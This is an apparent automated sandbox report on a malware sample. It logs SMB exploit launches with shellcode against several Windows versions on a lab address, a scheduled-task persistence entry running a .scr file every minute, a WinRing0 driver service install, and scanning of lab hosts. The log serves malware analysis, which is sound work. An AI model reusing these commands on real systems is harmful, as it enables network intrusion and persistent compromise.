cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
file C:\ProgramData\svchostromance.exe
file C:\ProgramData\svchostlong.exe
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "spreadEmnopq.exe")
section {u'size_of_data': u'0x0053aa00', u'virtual_address': u'0x00397000', u'entropy': 7.933859471955468, u'name': u'.rsrc', u'virtual_size': u'0x0053a990'} entropy 7.93385947196 description A section with a high entropy has been found
entropy 0.58321533602 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline taskkill /f /im spreadEmnopq.exe
cmdline ipconfig /flushdns
cmdline schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
cmdline schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 3
password:
display_name: WinRing0_1_2_0
filepath: C:\ProgramData\WinRing0x64.sys
service_name: WinRing0_1_2_0
filepath_r: C:\ProgramData\WinRing0x64.sys
desired_access: 983551
service_handle: 0x00000000002d4d60
error_control: 1
service_type: 1
service_manager_handle: 0x00000000002d4d30
1 2968928 0
dead_host 192.168.56.101:49373
dead_host 192.168.56.101:49629
dead_host 192.168.56.103:1433
dead_host 192.168.56.103:19490
dead_host 192.168.56.1:19490
dead_host 192.168.56.1:21
dead_host 192.168.56.101:50767
dead_host 192.168.56.1:135
dead_host 192.168.56.101:50801
dead_host 192.168.56.101:49184
dead_host 192.168.56.101:49291
dead_host 192.168.56.101:50222
dead_host 192.168.56.1:445
dead_host 192.168.56.101:50778
dead_host 192.168.56.101:49928
dead_host 192.168.56.101:50587
dead_host 192.168.56.101:50640
dead_host 192.168.56.1:1433
dead_host 192.168.56.103:21
dead_host 192.168.56.101:50004